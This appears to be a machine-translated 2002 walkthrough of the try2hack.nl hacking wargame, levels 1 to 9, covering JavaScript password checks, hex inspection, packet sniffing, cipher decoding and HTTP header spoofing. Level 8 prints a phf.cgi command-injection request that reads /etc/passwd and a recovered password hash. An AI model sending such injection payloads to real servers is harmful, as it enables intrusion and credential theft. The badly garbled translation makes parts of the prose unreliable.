Network shortcuts


Several days ago (13.06.02), some cake was thrown at me on ICQ url http://www.try2hack.nl/level1.html , say, check your strength. I admit, every job on this site was in its own way complex, but, at the same time, interesting. To all who did not pass this testing, I strongly recommend to try. Well, however, those who have already tried well-being also did not reach the 10th task, read this article =)
Well, let's begin. I will say that I will describe the current solutions to the main 9 tasks, I will only become detailed on the complex ones that are also interesting.

#1.

Elementary. Here's the sour on js password verification: 
  <SCRIPT LANGUAGE = "JavaScript">
 Function Try (passwd) {
 If (passwd == "hackerzzz") {
 Alert ("Alright! On to level 2 ...");
 Location.href = "levvel2.html";
 }
 Else {
 Alert ("The password is not correct." Please Do not Try Again. ");
 Location.href = "http://www.disney.com";
 };};
 }
 </ SCRIPT>
In the third line, the entered value is checked against the word "hackerzzz", which in this case plays the role of a password.

# 2.

I confess, to my main gaze, the task seemed difficult to me. I was wrong =)
Fill a flash drive, open it with a notebook (you can hex-editor) and at the very bottom (addresses 00000440-00000490) we see:
TxtUsername ...... Try2Hack.I .... txtPassword ...... NokiaIsGood.I .......... LLeVeLL3.html
Try2Hack Login
NokiaIsGood password
Track. Task LLeVeLL3.html

# 3.

Very witty also an interesting task.
Here is the source js'a: 
  <SCRIPT language = "JavaScript">
 Pwd = prompt ("Please enter the password for level 3:", "");
 If (pwd == PASSWORD) {
 Alert ("Alright! \ NEntering Level 4 ...");
 Location.href = CORRECTSITE;
 } Else
 {
 Alert ("WRONG! \ NBack to disneyland !!!");
 Location.href = WRONGSITE;
 }
 PASSWORD = "AbCdE";
 CORRECTSITE = "level4.html";
 WRONGSITE = "http://www.disney.com";
 </ SCRIPT>
It would seem that the password is "AbCdE", but how can it work if it is determined at the end? However, the variable PASSWORD at the time of verification for some reason was already defined, otherwise the interpreter would give an error "PASSWORD: the definition is missing." In addition, only after 20 minutes. Meditations, a line ran into the eye:
<SCRIPT src = "JavaScript"> </ SCRIPT>
In any way could not think that "JavaScript" is a file =))) In it as once the true values ​​of variables also lay:
PASSWORD = "TheCorrectAnswer";
CORRECTSITE = "thelevel4.html";
WRONGSITE = "http://www.disney.com";

#4.

Picking up the applet, caring attracted lines at the address 00000A60-00000A80. The applet read the lines from the file * level4 * (in the aftermath, the disasfixed sur's confirmed it). Most likely, it was a password file. Most interestingly, he continued to act on this with my screw. Then eat, file * level4 * was either in the internet or on my computer. And if on mine, in what place? Correctly, either in the cookie, or in Temp'ah. After cleaning those, also others, we went to the page with the applet. In the tempo, a couple of files appeared, one of which was level4 [2] .txt.
Content:
5_level_5.html
Try2Hack
AppletsAreEasy
By the way, inside the applet for tearing away the eye was this: "txtUsername = AlmostAHacker ..... txtPassword = ZqrE01A2d" Heathrow =)
/ * Gr33tz 2 godson * /

#5.

It is suggested to download the file level5.exe. In it, you need to enter a login and password, which are obviously stored in the file itself. Opening it hex'om in the eye has rushed:
Http: //www.try2hack.f2s.com/login-level6.html ..... txtUsername = AlmostAHacker ..... txtPassword = ZqrE01A2d
Addressa: 000019F0-00001A50.
Too easy, I thought. Additionally, the passwords did not fit. Further on, a disassembler came to help =):
Try2Hack Login
Password OutOfInspiration
Track. Task level-6.html
/ * Gr33tz 2 a3oX =) * /

# 6.

Very confusing task. Again blah blah is suggested to download the program, which on your eyes connects to the server also checks your data entered for validity. At this time the creators are honestly warned: "this is not level 5, you can not decompile this exe's".
The sniffer SpyNet came to the rescue. I will not describe how we did Che (we need a separate article), I will lay out only the package that interests us: 
 0000: 44 45 53 54 00 00 20 53 52 43 00 00 08 00 45 00 DEST .. SRC .... E.  0010: 02 40 5F 78 40 00 71 06 14 E0 D5 13 8C 02 C2 57. @ _ X @ .q ........ W 0020: 6F F 00 00 04 AE EC 04 FD 8C 1A 9A 11 B0 50 10 o..P .......... P.  0030: 40 7C AE D3 00 00 48 54 54 50 2F 31 2E 31 20 32 @ | .... HTTP / 1.1 2 0040: 30 30 20 4F 4B 0D 0A 44 61 74 65 3A 20 53 75 6E 00 OK .. Date: Sun 0050: 2C 20 31 34 20 41 70 72 20 32 30 30 32 20 31 38, 14 Apr 2002 18 0060: 3A 32 32 3A 35 35 20 47 4D 54 0D 0A 53 65 72 76: 22: 55 GMT. .Serv 0070: 65 72 3A 20 41 70 61 63 68 65 0D 0A 43 61 63 68 er: Apache..Cach 0080: 65 2D 43 6F 6E 74 72 6F 6C 3A 20 6D 61 78 2D 61 e-Control: max- A 0090: 67 65 3D 36 30 34 38 30 30 0D 0A 45 78 70 69 72 ge = 604800..Expir 00A0: 65 73 3A 20 53 75 6E 2C 20 32 31 20 41 70 72 20 es: Sun, 21 Apr 00B0 : 32 30 30 32 20 31 38 3A 32 32 3A 35 35 20 47 4D 2002 18:22:55 GM 00C0: 54 0D 0A 4C 61 73 74 2D 4D 6F 64 69 66 69 65 64 T..Last-Modified 00D0: 3A 20 57 65 64 2C 20 31 38 20 41 70 72 20 32 30: Wed, 18 Apr 20 00E0: 30 31 20 31 35 3A 32 38 3A 30 30 20 47 4D 54 0D 01 15:28:00 GMT.  00F0: 0A 45 54 61 67 3A 20 22 30 2D 63 63 2D 33 61 64 .ETag: "0-cc-3ad 0100: 64 62 32 38 30 22 0D 0A 41 63 63 65 70 74 2D 52 db280" .. Accept -R 0110: 61 6E 67 65 73 3A 20 62 79 74 65 73 0D 0A 43 6F anges: bytes..Co 0120: 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 30 ntent-Length: 20 0130 : 34 0D 0A 4B 65 65 70 2D 41 6C 69 76 65 3A 20 74 4..Keep-Alive: t 0140: 69 6D 65 6F 75 74 3D 31 35 2C 20 6D 61 78 3D 31 imeout = 15, max = 1 0150: 30 30 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 00..Connection: 0160: 4B 65 65 70 2D 41 6C 69 76 65 0D 0A 43 6F 6E 74 Keep-Alive..Cont 0170: 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 70 ent-Type: text / p 0180: 6C 61 69 6E 0D 0A 0D 0A 00 28 45 4E 43 52 59 50 lain ..... (ENCRYP 0190: 54 49 4F 4E 20 54 59 50 45 29 0D 0A 42 2A 43 2A TION TYPE) .. B * C * 01A0: 4E 2A 2A 4E 0D 0A 0D 0A 28 55 53 45 52 4E 41 4D N ** N ... (USERNAM 01B0: 45 29 0D 0A 61 62 61 62 61 20 61 62 62 61 62 20 E) .. ababa abbab 01C0: 62 61 61 61 61 20 61 61 61 62 62 0D 0A 0D 0A 28 baaaa aaabb ... (01D0: 50 41 53 53 57 4F 52 44 29 0D 0A 61 62 61 62 61 PASSWORD) .. ababa 01E0: 20 61 61 61 61 61 20 61 62 62 61 61 20 61 62 62 aaaaa abbaa abb 01F0: 62 61 20 61 61 61 61 61 20 62 61 61 61 61 20 62 ba aaaaa baaaa b 0200: 61 61 62 61 20 62 61 62 62 61 0D 0A 0D 0A 28 50 aaba babba .... (P 0210: 41 47 45 29 0D 0A 61 62 61 62 61 20 61 61 62 61 AGE) .. ababa aaba 0220: 61 20 62 61 61 62 62 20 61 61 62 61 61 20 61 62 a baabb aabaa ab 0230: 61 62 61 20 62 61 61 61 62 20 61 61 62 61 61 20 aba baaab aabaa 0240: 62 61 61 62 62 20 61 61 62 61 61 20 61 62 baabb aabaa ab
Slightly cropped (you try namano copy from SpyNet'a), but the main part (password, login, page) is seen well. It would seem that the lesson is done, but no. All data was encrypted: - /
(USERNAME) .. ababa abbab baaaa aaabb ....
(PASSWORD) .. ababa aaaaa abbaa abbba aaaaa baaaa baaba babba ....
I took JohnTheRipper'a also started busting ... joke =)) This was Bacon's algorithm. A complete algorithmic algorithm, not even encryption, but coding:
Aaaaa = a
Aaaab = b
Aaaba = c
Aaabb = d
etc.
The result of manual decoding was:
Login LORD
Paz LANPARTY
Page LEVELSEVEN.html
Teach computer science, children =)
/ * Gr33tz 2 D4rkGr3y;) * /

# 7.

Dan is a capricious pearl script level7.pl. Task: make him believe that:
1) the page from which we came to the site: http://www.microsoft.com/ms.htm
2) we use the Microsoft Internet Explorer 6.72 browser
3) UNIX / LINUX operating system
In general, the task is easy, we just need to generate such an http request, the header of which will contain this information. I.e:
Referer: http://www.microsoft.com/ms.htm
User-agent: MSIE 6.72
But with the axis a little problem. In the header, the field in which you explicitly specify the version of the operating system, no. It is usually pulled out of the User-agent. Hoping that level7.pl acts just like that, we sketched the pearl of the script that sent this request:
GET /cgi-bin/level7.pl HTTP / 1.0
Referer: http://www.microsoft.com/ms.htm
User-Agent: MSIE 6.72 (UNIX / LINUX)
Accept: * / *

And opa =)
<A HREF="../Level-8.html"> Level 8 </A>

#8.

Immediately attracted the name of the processing script phf.cgi. I remember a lot of hacking was on his conscience. Spraying on the bug-track, I found a solid:
/cgi-bin/phf.pp?Qalias=x%0a/bin/cat%20/etc/passwd
The answer was:
BuiZe: Bu3kOx4cCMX2U
The password is encrypted with the usual DES'om. JTR'u took 15 minutes to learn pas. What kind of distribution, perhaps, I will not do it in any way, who needs to be deciphered =)

#9.

On the page with the task the inscription flaunts:
New message for BuiZe:

Level 8 completed!
Go to irc. <*>. Org and join # <*>
There type / msg <*> begin

In other words, the battlefield is transferred to irk. The name of the server, channel, and bot, we hid for understandable (I hope all) reasons.

#9.

Consists of many mini-tasks.
We go to them on the channel # Try2Hack.
Write "/ msg Try2Hack perfect-start"
Well also what blah blah will he give us? But here's what:
-TRY2HACK- Welcome to try2hack level 9! Decode the following lines to continue:
-TRY2HACK- Wbva # gel2unpx.yriry9. Gb trg gur xrl lbh arrq gb qrpbqr gur sbyybjvat yvar:
-TRY2HACK-GTI2MJj5YJ15DxVmERy1rQIZ =
-TRY2HACK-Tbbq yhpx, naq frr lbh ba # gel2unpx.yriry9.
Decode yourself ... weakly? Well, at that time we will not mock you in any way:
Http://www.degraeve.com/cgi-bin/rot13.cgi
Here we also deciphered also that blah blah we got:
Join # try2hack.level9. To get the key you need to decode the following line:
TGV2ZWw5LW15QkIzREl1eDVM =
Good luck, and see you on # try2hack.level9.
We are in panic, too, we do not know. what the ?
TGV2ZWw5LW15QkIzREl1eDVM =
Hmm from the main view it seemed to me that everything was complicated, but we remembered that the mirkovski scripts are being scribbled / echo $ decode (TGV2ZWw5LW15QkIzREl1eDVM =, m) also we get Level9-myBB3DIux5L. We will get into this, we go to the channel,
-LEVEL9-XXX- Welcome, I am try2hack Level9! Decode the following lines to proceed:
-LEVEL9-XXX- 010011100110100101100011011001010010000001101010011011 ...
Old good-natured binary ... if you do not want to decode into the manual well
Http://www.nickciske.com/binary/index.php
We get "Nice job. Now type '/ msg TRY2HACK showbug' to see the bug"
Well, / msg TRY2HACK showbug also he illustrates a bug of that
-TRY2HACK- ovaq pgpe - CVAT pgpe: cvatercyl
-TRY2HACK-cebp pgpe: cvatercyl {avpx hubfg unaq qrfg xrl net} {
-TRY2HACK- frg qhe [rkce [havkgvzr] - $ net]
-TRY2HACK- chgfrei "ABGVPR $ avpx: Lbhe cvat ercyl gbbx $ qhe frpbaqf"}
Ooo no, it's backed up again. Well, we'll use the linker again above, who forgot%) ... we decrypted it .... And here's a bug ... we also sat down on this room if anyone does skinte soap on [email protected] .
For the solution of the 9th task, thank NeoN'a =)

Author: D4rkGr3y


The material is published with the permission of DHGROUP (http://www.dhgroup.org)